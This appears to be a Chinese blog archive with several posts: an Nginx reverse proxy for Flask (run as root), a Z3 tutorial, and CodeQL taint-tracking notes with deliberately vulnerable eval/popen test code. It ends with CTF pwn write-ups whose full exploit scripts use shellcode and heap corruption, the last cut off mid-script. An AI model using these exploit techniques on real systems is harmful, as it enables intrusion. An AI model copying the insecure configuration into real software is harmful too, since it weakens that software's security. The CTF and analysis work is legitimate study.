2020年7月

使用Nginx反向代理Flask静态资源
环境:Ubuntu 18.04

实现原理

如果flask项目里面有大量静态资源,可以尝试使用Nginx代理对静态资源的请求,把真正的动态请求转发给Flask。

比如:
flask在127.0.0.1监听8001端口,而Nginx配置为监听0.0.0.0的8000端口,那么在外部请求hostname:8000时就会把动态请求转发到8001上,而静态资源请求则直接代理至储存静态资源的目录下。

Nginx配置

安装

apt install nginx

配置文件路径

  1. 存放全局配置:/etc/nginx/nginx.conf
  2. 存放单个server配置:/etc/nginx/conf.d/xxx-xxx-xxx.conf
    > 这个目录下的配置默认被1中的配置文件include了,所以可以单独编辑

* 注意Nginx配置文件的内层块是会继承外层块的属性的

具体配置内容

nginx.conf

  • 其中每个配置项都大有讲究,单这里重点标记反代flask要注意的
  • 如果在运行中改变了配置文件可以用nginx -s reload重载
#default: www-data
#这里要注意,运行nginx的用户需要和flask保持一致(这里个人原因用了root),否则会发生权限错误
user root;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;

events {
    worker_connections 768;
    # multi_accept on;
}

http {
    sendfile on;
    tcp_nopush on;
    tcp_nodelay on;
    keepalive_timeout 65;
    types_hash_max_size 2048;
    # server_tokens off;

    # server_names_hash_bucket_size 64;
    # server_name_in_redirect off;

    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    ##
    # SSL Settings
    ##

    ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE
    ssl_prefer_server_ciphers on;

    ##
    # Logging Settings
    ##

    access_log /var/log/nginx/access.log;
    error_log /var/log/nginx/error.log;

    ##
    # Gzip Settings
    ##

    gzip on;

    # gzip_vary on;
    # gzip_proxied any;
    # gzip_comp_level 6;
    # gzip_buffers 16 8k;
    # gzip_http_version 1.1;
    # gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;

    ##
    # Virtual Host Configs
    ##

    include /etc/nginx/conf.d/*.conf;
    #include /etc/nginx/sites-enabled/*;
}

xxx-xxx-xxx.conf

  • 这个文件比较重要
server {
    listen      8000; # 对外监听的端口

    root        /root/github/Vision-Ward; #服务器上的项目目录
    server_name arm.eqqie.cn; # 域名

    # 处理静态资源:
    #注意这里用了正则表达式,也就是把路由到/static/*的请求都视为对静态资源的请求
    location ~ ^\/static\/.*$ { 
        #这里的root表示静态资源的位置,注意如果按照上面的写法,会在这个路径后拼接上static,所以这里只需要写到static的上层目录即可
        root /root/github/Vision-Ward/app;
    }

    # 动态请求转发到8001端口(gunicorn):
    location / {
        #flask监听的位置(不对外)
        proxy_pass       http://127.0.0.1:8001;
        #这里也很重要,把请求的原始信息暴露给藏在后面的flask,避免其没有办法获取用户真正的ip地址
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header Host $host;
        #建议如果涉及非80端口请求重定向的时候,用下面这种设置,可以避免重定向后端口消失的问题
        #proxy_set_header Host arm.eqqie.cn:8000;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }
}

flask配置

  • 注意监听地址保持和配置文件中proxy_pass一致
  • 然后只需要正常启动flask即可

使用nginx启动服务,如果遇到错误直接复制下来查就会有很多答案。也可以多注意看看log。

  • z3作为微软开发的求解器,其提供的接口在很多应用程序和编程语言中都可以使用。
    > z3prover在CHAINSAWNAVEX中均有使用
  • 在这里关键的作用是想要配和CodeQL,通过CodeQL提取路径约束,然后用Z3求解约束
  • 其实关于如何用CodeQL提取出可以作为z3输入的约束还是一头雾水...但是这不妨碍先学习z3的使用,说不定可以找到一些灵感完成两者的结合。(应该会有办法的,要不这条研究路线就断了)
  • 后期可能需要造一些轮子,这么说来还是需要花挺多时间的(尤其是假期即将结束,需要挺多时间复习开学期考功课)
  • 官方使用文档:https://rise4fun.com/z3/tutorialcontent/guide
  • z3py功能手册:https://z3prover.github.io/api/html/namespacez3py.html
  • z3py使用文档:https://ericpony.github.io/z3py-tutorial/guide-examples.htm
    > 如果二进制版的z3不便于后期结合,还需要花时间学下z3py
  • z3所使用的语法标准:http://smtlib.cs.uiowa.edu/papers/smt-lib-reference-v2.6-r2017-07-18.pdf
  • 最后,关于细节本文记录得不是很多,所以需要一些基础来阅读

环境安装

编译好的二进制版

  1. Github下载最新版:https://github.com/Z3Prover/z3/releases
    Z3prover
  2. 解压后将其中的bin目录添加到环境变量(Unix-like系统可以添加软连接到/usr/bin中)
  3. z3 <filename> 使用

z3py

  1. pip install z3-prover
  2. from z3 import * 使用
    > 注意在z3py中,很多语句被封装成了对象/类方法,但是基本求解逻辑还是一样的,取决于后期打算采用何种形式

基本语法

指令结构

z3指令有一套自己的结构,一般称为三地址码,其遵循的标准在引言中有链接。
基本的构成为 操作符 操作数1 操作数2

常量(constants)和函数(functions)

这是z3指令中最常见的两种结构,然而本质上常量只是作为一个没有参数的函数,其求解结果也以函数结构所表现。

(declare-fun f (Int) Int) ; 这里f是接受Int类型的函数
(declare-fun a () Int) ; a可以看成常量
(declare-const b Int) ; 语法糖写法,声明一个常量

与编程语言中函数不同的是,z3中的函数可以视为一个未解释的公式,不会在运行时抛出异常,也不会出现没有返回值的情况。专业术语将其称之为一阶逻辑或者谓词演算——百度百科。一阶逻辑中的“函数”是“未定义”的,意思就是不存在一种类似于四则运算一般固定的解释模式(model)。只要任何符合约束条件的model,都可以作为一种解释,而check-set就是用来求解的。

很抽象,可以看下面例子大概理解下。

用z3证明 f(f(x)) = x, f(x)=y, x!=y约束的存在性(给出一种可能性解释),并且还定义了一个抽象的类型(sort在z3中表示类型,使用declare-sort定义类型):

(declare-sort A)
(declare-const x A)
(declare-const y A)
(declare-fun f (A) A)
(assert (= (f (f x)) x))
(assert (= (f x) y))
(assert (not (= x y)))
(check-sat)
(get-model)
需要特别注意下z3函数的使用方式与编程语言不同:编程语言通过(x1,x2,x3)方式传参,而z3将函数视为一个运算符号通过类似三地址码的方式传参 —— 函数符号 x1 x2 x3

输出:

sat
(model
  ;; universe for A:
  ;;   A!val!0 A!val!1
  ;; -----------
  ;; definitions for universe elements:
  (declare-fun A!val!0 () A)
  (declare-fun A!val!1 () A)
  ;; cardinality constraint:
  (forall ((x A)) (or (= x A!val!0) (= x A!val!1)))
  ;; -----------
  (define-fun x () A
    A!val!0)
  (define-fun y () A
    A!val!1)
  (define-fun f ((x!0 A)) A
    (ite (= x!0 A!val!1) A!val!0
      A!val!1))
)

生成的模型为A引入了抽象值。

算数运算

基本运算

z3内置了对于整数和实数等数学类型的支持,而且貌似最新版已经合并了原先的插件——z3str,可以进行字符串处理,关于这部分文档似乎没有详细说明...

declare-const可以用于声明整数和实数常量

如:

(declare-const a Int)
(declare-const b Int)
(declare-const c Int)
(declare-const d Real)
(declare-const e Real)

声明完常量后,就可以在后续的式子中使用这些变量,式子中可以包含常用的数学运算符如:
+ - x div/mod/ram

check-sat & get-model

check-sat是高频使用的命令,用于对表达式求解,基本上就是为每个常数分配一个数字。如果存在一种解使得所有式子为真,那么结果就为sat,并且称这个解释为一个model,使用get-model可以查看;如果不存在解释,则结果为unsat,也无法获取可行的model。
例子:

(declare-const a Int)
(declare-const b Int)
(declare-const c Int)
(declare-const d Real)
(declare-const e Real)
(assert (> a (+ b 2)))
(assert (= a (+ (* 2 c) 10)))
(assert (<= (+ c b) 1000))
(assert (>= d e))
(check-sat)
(get-model)

输出:

sat
(model
  (define-fun c () Int
    0)
  (define-fun b () Int
    0)
  (define-fun e () Real
    0.0)
  (define-fun d () Real
    0.0)
  (define-fun a () Int
    10)
)

类型转换

在z3中Int类型和Real类型不会自动互相转换,但是借助函数to-Real(参数为一个整数)可以将整数化为实数。
例子:

(assert (> e (+ (to_real (+ a b)) 2.0)))
(assert (= d (+ (to_real c) 0.5)))

非线性运算特性

当式子中有类似(* t s)的实数运算时称为非线性式,这种式子求解极其困难,导致z3在求解非线性问题的时候不一定总能确定是否有解。当无法确定是否可以求解时使用check-sat会返回unknow;当然,部分特殊的非线性式依然可以确定可满足性。
例子:

(declare-const a Int)
(assert (> (* a a) 3))
(check-sat)
(get-model)

(echo "Z3 does not always find solutions to non-linear problems")
(declare-const b Real)
(declare-const c Real)
(assert (= (+ (* b b b) (* b c)) 3.0))
(check-sat)

(echo "yet it can show unsatisfiabiltiy for some nontrivial nonlinear problems...")
(declare-const x Real)
(declare-const y Real)
(declare-const z Real)
(assert (= (* x x) (+ x 2.0)))
(assert (= (* x y) x))
(assert (= (* (- y 1.0) z) 1.0))
(check-sat)

(reset)
(echo "When presented only non-linear constraints over reals, Z3 uses a specialized complete solver")
(declare-const b Real)
(declare-const c Real)
(assert (= (+ (* b b b) (* b c)) 3.0))
(check-sat)
(get-model)

输出:

sat
(model
  (define-fun a () Int
    (- 3))
)
Z3 does not always find solutions to non-linear problems
unknown
yet it can show unsatisfiabiltiy for some nontrivial nonlinear problems...
unsat
When presented only non-linear constraints over reals, Z3 uses a specialized complete solver
sat
(model
  (define-fun b () Real
    (/ 1.0 8.0))
  (define-fun c () Real
    (/ 1535.0 64.0))
)

除法运算

z3支持除法、求模和求余运算,这些运算在底层都会被映射成乘法。

注意在实数除法的时候用符号/,因为实数没有求模和取余。

例子:

(declare-const a Int)
(declare-const r1 Int)
(declare-const r2 Int)
(declare-const r3 Int)
(declare-const r4 Int)
(declare-const r5 Int)
(declare-const r6 Int)
(assert (= a 10))
(assert (= r1 (div a 4))) ; integer division
(assert (= r2 (mod a 4))) ; mod
(assert (= r3 (rem a 4))) ; remainder
(assert (= r4 (div a (- 4)))) ; integer division
(assert (= r5 (mod a (- 4)))) ; mod
(assert (= r6 (rem a (- 4)))) ; remainder
(declare-const b Real)
(declare-const c Real)
(assert (>= b (/ c 3.0)))
(assert (>= c 20.0))
(check-sat)
(get-model)

输出:

sat
(model
  (define-fun c () Real
    20.0)
  (define-fun b () Real
    (/ 20.0 3.0))
  (define-fun r6 () Int
    (- 2))
  (define-fun r5 () Int
    2)
  (define-fun r4 () Int
    (- 2))
  (define-fun r3 () Int
    2)
  (define-fun r2 () Int
    2)
  (define-fun r1 () Int
    2)
  (define-fun a () Int
    10)
)

z3有一个很有意思的地方,就是不会发生除0错误,因为除0操作是未定义的,在求解的时候可以被定义为一个函数。
例如:

(declare-const a Real)
; The following formula is satisfiable since division by zero is not specified.
(assert (= (/ a 0.0) 10.0)) 
(check-sat)
(get-model)

; Although division by zero is not specified, division is still a function.
; So, (/ a 0.0) cannot evaluated to 10.0 and 2.0.
(assert (= (/ a 0.0) 2.0)) 
(check-sat)

输出:

sat
(model
  (define-fun a () Real
    1.0)
  (define-fun /0 ((x!0 Real) (x!1 Real)) Real
    10.0)
)
unsat

如果对上述行为不满意还可以使用ite语句自定义除法规则:

; defining my own division operator where x/0.0 == 0.0 for every x.
(define-fun mydiv ((x Real) (y Real)) Real
  (if (not (= y 0.0))
      (/ x y)
      0.0))
(declare-const a Real)
(declare-const b Real)
(assert (>= (mydiv a b) 1.0))
(assert (= b 0.0))
(check-sat)
关于ite语句:
其实就是if-then-else语句,其结构为(if 条件 真返回值 假返回值)
此处判断被除数是否为0来返回不同结果

位向量

暂略,用到的不多

数组

常用数组操作

  • 数组定义:(declare-const a1 (Array Int Int))

    这是使用了语法糖的定义方式,原生定义方式如下:

    (define-fun a1 () (Array Int Int) [val])
    例如:

    (define-fun a2 () (Array Int Int)
    ((as const (Array Int Int)) 0))
    
  • 取出值:(select a i)

    a-数组;i-下标;返回:a数组下标对应值
  • 存入值:(store a i v)

    a-数组;i-下标;v-新值;返回:数组本身

例子:

(declare-const x Int)
(declare-const y Int)
(declare-const z Int)
(declare-const a1 (Array Int Int))
(declare-const a2 (Array Int Int))
(declare-const a3 (Array Int Int))
(assert (= (select a1 x) x))
(assert (= (store a1 x y) a1))
(check-sat)
(get-model)

输出:

sat
(model
  (define-fun y () Int
    0)
  (define-fun a1 () (Array Int Int)
    (store ((as const (Array Int Int)) 1) 0 0))
  (define-fun x () Int
    0)
  (define-fun z () Int
    0)
  (define-fun a2 () (Array Int Int)
    ((as const (Array Int Int)) 0))
  (define-fun a3 () (Array Int Int)
    ((as const (Array Int Int)) 0))
)

常数数组

当数组中每个索引都指向同一个值就变成了常数数组。可以使用as const (Array T1 T2)结构构造一个常数数组,该结构会返回指定类型的数组。原文档对这块的介绍不是很详细,我提取了主要的语句结构如下:

(declare-const a (Array Int Int))
(assert (= a ((as const (Array Int Int)) 1)))

第一句声明一个数组,第二句用断言的方式将该数组约束为常数数组。
例子:

(declare-const all1 (Array Int Int))
(declare-const a Int)
(declare-const i Int)
(assert (= all1 ((as const (Array Int Int)) 1)))
(assert (= a (select all1 i)))
(check-sat)
(get-model)
(assert (not (= a 1)))
(check-sat)

输出:

sat
(model
  (define-fun a () Int
    1)
  (define-fun all1 () (Array Int Int)
    ((as const (Array Int Int)) 1))
  (define-fun i () Int
    0)
)
unsat

官方文档:https://help.semmle.com/QL/learn-ql/python/pointsto-type-infer.html

中文翻译:https://github.com/xsser/codeql_chinese

Python-CodeQL中抽象语法树相关的类

Abstract syntax tree

  • AstNode > - Module – A Python module > - Class – The body of a class definition > - Function – The body of a function definition > - Stmt – A statement >> - Assert – An assert statement >> - Assign – An assignment >>> - AssignStmt – An assignment statement, x = y >>> - ClassDef – A class definition statement >>> - FunctionDef – A function definition statement >> - AugAssign – An augmented assignment, x += y >> - Break – A break statement >> - Continue – A continue statement >> - Delete – A del statement >> - ExceptStmt – The except part of a try statement >> - Exec – An exec statement >> - For – A for statement >> - If – An if statement >> - Pass – A pass statement >> - Print – A print statement (Python 2 only) >> - Raise – A raise statement >> - Return – A return statement >> - Try – A try statement >> - While – A while statement >> - With – A with statement > - Expr – An expression >> - Attribute – An attribute, obj.attr >> - Call – A function call, f(arg) >> - IfExp – A conditional expression, x if cond else y >> - Lambda – A lambda expression >> - Yield – A yield expression >> - Bytes – A bytes literal, b"x" or (in Python 2) "x" >> - Unicode – A unicode literal, u"x" or (in Python 3) "x" >> - Num – A numeric literal, 3 or 4.2 >>> - IntegerLiteral >>> - FloatLiteral >>> - ImaginaryLiteral >> - Dict – A dictionary literal, {'a': 2} >> - Set – A set literal, {'a', 'b'} >> - List – A list literal, ['a', 'b'] >> - Tuple – A tuple literal, ('a', 'b') >> - DictComp – A dictionary comprehension, {k: v for ...} >> - SetComp – A set comprehension, {x for ...} >> - ListComp – A list comprehension, [x for ...] >> - GenExpr – A generator expression, (x for ...) >> - Subscript – A subscript operation, seq[index] >> - Name – A reference to a variable, var >> - UnaryExpr – A unary operation, -x >> - BinaryExpr – A binary operation, x+y >> - Compare – A comparison operation, 0 < x < 10 >> - BoolExpr – Short circuit logical operations, x and y, x or y

Analyzing control flow

同一个函数作用域中查找互斥块

import python

from BasicBlock b1, BasicBlock b2
where b1 != b2 and not b1.strictlyReaches(b2) and not b2.strictlyReaches(b1) and
exists(Function shared, BasicBlock entry |
    entry.contains(shared.getEntryNode()) and
    entry.strictlyReaches(b1) and entry.strictlyReaches(b2)
)
select b1, b2

This typically gives a very large number of results, because it is a common occurrence in normal control flow. It is, however, an example of the sort of control-flow analysis that is possible. Control-flow analyses such as this are an important aid to data flow analysis. For more information, see Analyzing data flow and tracking tainted data in Python.

搜索结果特别大,可用性不高,可以优化一下

Pointer analysis & type inference

指针分析: https://zhuanlan.zhihu.com/p/79804033 (算法较为复杂,尝试丢给求解器计算) 类型推断: https://zhuanlan.zhihu.com/p/97441100

The predicate ControlFlowNode.pointsTo(...) shows which object a control flow node may 'point to' at runtime.

ControlFlowNode.pointsTo(...) has three variants:

predicate pointsTo(Value object)
predicate pointsTo(Value object, ControlFlowNode origin)
predicate pointsTo(Context context, Value object, ControlFlowNode origin)

For complex data flow analyses, involving multiple stages, the ControlFlowNode version is more precise, but for simple use cases the Expr based version is easier to use. For convenience, the Expr class also has the same three predicates. Expr.pointsTo(...) also has three variants:

predicate pointsTo(Value object)
predicate pointsTo(Value object, AstNode origin)
predicate pointsTo(Context context, Value object, AstNode origin)

查询无法被执行的异常处理块

当一个Try语句中,先后有多个Handler,但是前面所捕捉的错误类型是后面的超类,就会导致后面的错误捕捉永远无法被执行

该查询中利用i<j来表示Handler的顺序,利用getTypepointsTo确定类关系。

猜测 | 符号在此处的作用类似与管道,把输入定向到后面的子句。注意在第二个exists中由于调用了谓词,所以进行了两次定向。

getASuperType()可以获得超类。

import python

from Try t, ExceptStmt ex1, ExceptStmt ex2
where
exists(int i, int j |
    ex1 = t.getHandler(i) and ex2 = t.getHandler(j) and i < j
)
and
exists(ClassValue cls1, ClassValue cls2 |
    ex1.getType().pointsTo(cls1) and
    ex2.getType().pointsTo(cls2) |
    not cls1 = cls2 and
    cls1 = cls2.getASuperType()
)
select t, ex1, ex2

寻找可能将不可迭代对象作为循环迭代的位置

不溯源

通过loopup可以查看一些类属性

import python 
from For loop, Value iter, ClassValue cls 
where loop.getIter().getAFlowNode().pointsTo(iter) 
    and   cls = iter.getClass() 
    and   not exists(cls.lookup("__iter__")) 
select loop, cls

溯源(结合AstNode)

使用 predicate pointsTo(Value object, AstNode origin) 这个谓词,并输出origin

import python

from For loop, Value iter, ClassValue cls, AstNode origin
where loop.getIter().pointsTo(iter, origin) and
  cls = iter.getClass() and
  not cls.hasAttribute("__iter__")
select loop, cls, origin

Finding calls using call-graph analysis

直接通过函数名查找函数调用

import python

from Call call, Name name
where call.getFunc() = name and name.getId() = "eval"
select call, "call to 'eval'."

问题:

  1. 可能误认为某些对自定义方法名为eval的方法的调用
  2. 默认了调用的函数名为eval,可能漏掉一些情况

改良版
利用Value::named()和getACall取得对eval正确调用,然后在控制流图上检索出来
同时结合控制流图检索可以有效防止跑到python内置模块中搜索一大堆无关结果,提高了结果的相关性
(技巧:合理利用CFG)

import python

from ControlFlowNode call, Value eval
where eval = Value::named("eval") and
      call = eval.getACall()
select call, "call to 'eval'."

Analyzing data flow & tracking tainted data —— 数据流、污点追踪

Tracking user-controlled, or tainted, data is a key technique for security researchers.
数据流分析和污点追踪的主要用途在于分析用户可控的输入是否可能作为污点数据进行恶意行为,或者一些敏感数据会不会被泄露。

CodeQL的CFG分析模块设计思路

主要要解决标准库无法跟踪、变量间赋值导致的混淆以及需要大量计算时间的问题...

  1. Local data flow, concerning the data flow within a single function. When reasoning about local data flow, you only consider edges between data flow nodes belonging to the same function. It is generally sufficiently fast, efficient and precise for many queries, and it is usually possible to compute the local data flow for all functions in a CodeQL database.
  2. Global data flow, effectively considers the data flow within an entire program, by calculating data flow between functions and through object properties. Computing global data flow is typically more time and energy intensive than local data flow, therefore queries should be refined to look for more specific sources and sinks.

Taint Tracking 的组成

  1. One or more sources of potentially insecure or unsafe data, represented by the TaintTracking::Source class. 多个追踪源
  2. One or more sinks, to where the data or taint may flow, represented by the TaintTracking::Sink class. 多个薄弱位置
  3. Zero or more sanitizers, represented by the Sanitizer class. 0或多个过滤器

Taint Tracking 查询的基本形式

类继承之后要按照实际情况重写几个主要的谓词,以便具体化源和目标位置的特征。
主要负责完成追踪的是hasFlow方法。

/**
 * @name ...
 * @description ...
 * @kind problem
 */

import semmle.python.security.TaintTracking

class MyConfiguration extends TaintTracking::Configuration {

    MyConfiguration() { this = "My example configuration" }

    override predicate isSource(TaintTracking::Source src) { ... }

    override predicate isSink(TaintTracking::Sink sink) { ... }

    /* optionally */
    override predicate isExtension(Extension extension) { ... }

}

from MyConfiguration config, TaintTracking::Source src, TaintTracking::Sink sink
where config.hasFlow(src, sink)
select sink, "Alert message, including reference to $@.", src, "string describing the source"

从HTPP请求到Unsafe函数的Track

在定义Sink类型的时候需要继承自TainiTracking::Sink,并写一个类似“构造函数”的东西说明Sink的特征,最后重写sinks方法说明Sink的类型。

/* Import the string taint kind needed by our custom sink */
import semmle.python.security.strings.Untrusted

/* Sources */
import semmle.python.web.HttpRequest

/* Sink */
/** A class representing any argument in a call to a function called "unsafe" */
class UnsafeSink extends TaintTracking::Sink {

    UnsafeSink() {
        exists(FunctionValue unsafe |
            unsafe.getName() = "unsafe" and
            unsafe.getACall().(CallNode).getAnArg() = this
        )
    }

    override predicate sinks(TaintKind kind) {
        kind instanceof StringKind
    }

}

class HttpToUnsafeConfiguration extends TaintTracking::Configuration {

    HttpToUnsafeConfiguration() {
        this = "Example config finding flow from http request to 'unsafe' function"
    }

    override predicate isSource(TaintTracking::Source src) { src instanceof HttpRequestTaintSource }

    override predicate isSink(TaintTracking::Sink sink) { sink instanceof UnsafeSink }

}

from HttpToUnsafeConfiguration config, TaintTracking::Source src, TaintTracking::Sink sink
where config.hasFlow(src, sink)
select sink, "This argument to 'unsafe' depends on $@.", src, "a user-provided value"

样例中其实还有很多东西没说明白,其实关键在于弄清楚以下几个东西的写法:

  • Source (TaintTracking::Source) > 表示起始点
  • Sink (TaintTracking::Sink) > 表示利用点 (Source和Sink都封装了很多常用的类)
  • Configuration (TaintTracking::Configuration) > 负责串联Source和Sink
  • TaintKind (TaintKind) > 可以使用内置的或自定的 文档写的并不是很深入、详细,可能需要翻看封装好的库借鉴一下

TaintTracking::Sink和TaintTracking::Source中用于确定污点类型的谓词分别如下:

abstract class Source {
    abstract predicate isSourceOf(TaintKind kind);
    ...
}

abstract class Sink {
    abstract predicate sinks(TaintKind taint);
    ...
}

案例测试

测试用例(其一)

Source: input()

Sink: eval()

module: calc.py

import os, sys, re

class calc:
    def checkExpr(self, expr):
        a = re.split(pattern=r"[+|-|x|/]", string = expr)
        print(a)
        try:
            int(a[0])
            int(a[1])
        except:
            return 0
        return 1
    def getResult(self, expr):
        if(self.checkExpr(expr)):
            full_expr = "print(%s)"%(expr)
            print(full_expr)
            eval(full_expr) #sink2
            return 1
        else:
            print("hacker!")
            return 0

module: test1.py

import os, sys, re
import calc as ca

class calc:
    def checkExpr(self, expr):
        a = re.split(pattern=r"[+|-|x|/]", string = expr)
        print(a)
        try:
            int(a[0])
            int(a[1])
        except:
            return 0
        return 1
    def getResult(self, expr):
        if(self.checkExpr(expr)):
            full_expr = "print(%s)"%(expr)
            print(full_expr)
            eval(full_expr) #sink2
            return 1
        else:
            print("hacker!")
            return 0

def checkExpr(expr):
    a = re.split(pattern=r"[+|-|x|/]", string = expr)
    print(a)
    try:
        int(a[0])
        int(a[1])
    except:
        return 0
    return 1
def getResult(expr):
    if(checkExpr(expr)):
        full_expr = "print(%s)"%(expr)
        print(full_expr)
        eval(full_expr) #sink2
        return 1
    else:
        print("hacker!")
        return 0

expr = input("expr> ")

test = calc()
test.getResult(expr)

getResult(expr)

module: test2

import os, sys

black_list = ["cmd", "cmd.exe"]

cmd = input("cmd> ")

for item in black_list:
    if item in cmd:
        print("hacker!")
        break
else:
    print(os.popen(cmd).read()) #sink1



我的发现

CodeQL似乎对python的跨模块DataFlow支持不太好(也有一定可能是我写的查询不够完善)。
估计这是个普遍性问题,NAVEX的作者设计思路也是在一开始单独分析每个模块中的sink,只不过她在不同的研究中采取了不同的方式完成从Source到Sink的串联。
由此可以确定,跨模块是一大难点,针对多模块python应用如何解决模块间的溯源是一个可以进行创新的角度。

控制变量分析:

  1. 当Sink在不同模块的类内部的成员方法时,无法完整溯源
  2. 当Sink在同一个模块的类内部的成员方法时,可以溯源到Source
  3. 当Sink在同一个模块单独作为函数声明时,可以溯源到Source
  4. 当Sink在不同模块单独作为函数声明时,无法完整溯源

查询脚本

//import semmle.python.security.strings.Untrusted
import python
/* Sources */
//import semmle.python.web.HttpRequest

class EvalSink extends TaintSink {
      EvalSink() {
          exists(FunctionValue eval |
              eval.getName() = "eval" and
              eval.getACall().(CallNode).getAnArg() = this
          )
      }
      override predicate sinks(TaintKind kind) {
          kind instanceof StringKind
      }

}

class InputSrc extends TaintSource{
    InputSrc() {
        exists(FunctionValue input|
            input.getName() = "input" and
            this = input.getACall()
        )
    }
    override predicate isSourceOf(TaintKind kind) {
        kind instanceof StringKind
    }
}

class InputToEvalConfiguration extends TaintTracking::Configuration {

    InputToEvalConfiguration() {
          this = "Example config finding flow from http request to 'unsafe' function"
      }

      override predicate isSource(TaintSource src) { src instanceof InputSrc }

      override predicate isSink(TaintSink sink) { sink instanceof EvalSink }

}

  from InputToEvalConfiguration config, TaintSource src, TaintSink sink
  where config.hasFlow(src, sink)
  select sink, "This argument to 'eval' depends on $@.", src, "a user-provided value"

解题思路综合了wp和比赛时的思路,做了一点简化

CoolCode

这题一开始粗心了,没看见有个逻辑漏洞导致可以绕过可见字符判断,但是在这种情况下sad师傅还是吧shellcode构造出来了,实属牛批…..

分析

  1. add功能在bss段保存堆指针,但是没限制index可以为负数,导致可以覆盖got表为堆指针
  2. add功能在读取输入的时候会用一个函数检查输入中是否包含了非数字和大写字母内容,如果有则调用exit结束程序。但是这个函数存在一个逻辑漏洞,当输入长度为1时,for循环不会进入,导致存在1字节的无效过滤。
  3. 只要覆盖free_got到堆上,并写入ret指令对应的字节b"\xc3″,就可以在exit时返回继续执行,绕过检查。(虽然绕过了检查,但是由于程序使用strncpy拷贝内容,还要注意\x00截断问题)
if ( (unsigned int)filter_input((__int64)s, num) )// 限制输入内容
  {
    puts("read error.");
    exit(1);
  }
signed __int64 __fastcall filter_input(__int64 buf, int len)
{
  int i; // [rsp+14h] [rbp-8h]

  for ( i = 0; i < len - 1; ++i )
  {
    if ( (*(_BYTE *)(i + buf) <= 47 || *(_BYTE *)(i + buf) > 57)// 0~9
      && (*(_BYTE *)(i + buf) <= 64 || *(_BYTE *)(i + buf) > 90) )// 大写字母
    {
      return 1LL;                               // error
    }
  }
  return 0LL;
}
  1. 堆上有执行权限,可以考虑构造read调用把shellcode读到write_got指向的堆上执行(只要加好偏移,执行完read调用后就会立刻执行shellcode)
  2. 程序开启了seccomp保护,只剩下部分系统调用号,其中fstat刚好对应32位下的open,于是想到在shellcode中可以使用retf切换到32位打开“./flag"再回到64位read&write。(这里是难点,retf通过pop ip和pop cs改变程序位数,要注意retf在构造栈时需要按照32位栈来构造)
  3. 最后从返回中读取flag即可

EXP

from pwn import *
p=process("./coolcode")
context.log_level = "debug"
#p=remote("39.107.119.192",9999)
def add(index,content):
    p.recvuntil(b"Your choice :")
    p.sendline(b"1")
    p.recvuntil(b"Index: ")
    p.sendline(str(index).encode())
    p.recvuntil(b"messages: ")
    p.send(content)

def show(index):
    p.recvuntil(b"Your choice :")
    p.sendline(b"2")
    p.recvuntil(b"Index: ")
    p.sendline(str(index).encode())

def delete(index):
    p.recvuntil(b"Your choice :")
    p.sendline(b"3")
    p.recvuntil(b"Index: ")
    p.sendline(str(index).encode())

def exp():
    #gdb.attach(p,"b *0x400E61\nc\n")
    # no \x00
    read_shellcode = '''
    xor rdi, rdi;
    sub rsi, 0x30
    mov rdx, rsi;
    xor rax, rax;
    syscall;
    '''
    read_shellcode = asm(read_shellcode, arch="amd64")
    add(-22, "\xc3") # exit_got->ret
    add(-34, read_shellcode) # write_got
    add(0, "CCCCCCCC")
    show(0)

    shellcode = ""
    a = '''
        add rcx, 19;
        mov rbx, 0x23
        SHL rbx, 32;
        add rcx, rbx;
        push rcx;
        retf
        mov esp, edx
        '''
    shellcode += asm(a,arch="amd64");

    b = '''
        mov eax, 5;
        push 0x00006761;
        push 0x6c662f2e;
        mov ebx, esp;
        mov ecx, 0;
        int 0x80;

        add edx, 0x43;
        push 0x33
        push edx
        retf
        '''
    shellcode += asm(b,arch="i386");

    c = '''
        mov rdi, rax;
        mov rsi, 0x602100;
        mov rdx, 0x40;
        mov rax, 0;
        syscall;

        mov rdi, 1;
        mov rsi, 0x602100;
        mov rdx, 0x40;
        mov rax, 1;
        syscall;
        '''
    shellcode += asm(c,arch="amd64");
    p.sendline("\x90"*0xe+shellcode)
    show(0)

    p.interactive()

if __name__ == "__main__":
    exp()

Snake

是个趣味题,思路不难,关键是io量太大了,容易卡住…

分析

  1. 程序是个贪吃蛇游戏,游戏地图和玩家姓名保存在堆上。假如游戏死亡,会根据死亡位置让你留下一段信息,这段信息写在存着地图的堆块上。经过测试,只要在右下角死亡,就会存在off_by_one,可以修改下一堆块的prev_size和size的低字节。
  2. 由于保存姓名的堆块大小有限制,不能为unsorted_bin,于是通过off_by_one的修改出一个unsorted_bin,同时构造一个overlapping。
  3. 泄露出unsorted_arena计算出libc_base,并利用overlapping修改其中fast_chunk的指针,把堆块分配到malloc_hook。
  4. 最后往malloc多试几个one_gadget就可以getshell了
  5. 要注意,在写脚本的时候,recv()一次游戏只会刷新一帧,需要写一个while循环send(“s”)方向键直到出现死亡信息。

EXP

from pwn import *
import time

p = process("./snake")
context.log_level = "debug"
#p = remote("39.107.244.116",9999)
def add(index,length,name):
    p.recvuntil(b"4.start name\n")
    p.sendline(b"1")
    p.recvuntil(b"index?\n")
    p.sendline(str(index).encode())
    p.recvuntil(b"how long?\n")
    p.sendline(str(length).encode())
    p.recvuntil(b"name?\n")
    p.sendline(name)

def delete(index):
    p.recvuntil(b"4.start name\n")
    p.sendline(b"2")
    p.recvuntil(b"index?\n")
    p.sendline(str(index).encode())

def get(index):
    p.recvuntil(b"4.start name\n")
    p.sendline(b"3")
    p.recvuntil(b"index?\n")
    p.sendline(str(index).encode())

def start():
    p.recvuntil(b"4.start name\n")
    p.sendline(b"4")

def play2die():
    while(1):
        ret = p.recv()
        if b"please leave words:\n" in ret:
            break
        else:
            p.send("s")
        time.sleep(0.6)

def exp():
    p.recvuntil(b"how long?\n")
    p.sendline(b"96")
    p.recvuntil(b"input name\n")
    list_start = 0x603140 #name_ptr_list
    name = b"A"*8
    p.sendline(name)

    play2die()

    words = b"123123"
    p.sendline(words)
    p.recvuntil(b"if you want to exit?\n")
    p.sendline(b"n")
    add(1,0x60,b"BBBBBBBB")
    add(2,0x20,p64(0xf0)+p64(0x21))

    start()
    play2die()
    words = b"A"*(4+0x40) + b"B"*8 + b"\xf1"
    p.send(words)
    p.recvuntil(b"if you want to exit?\n")
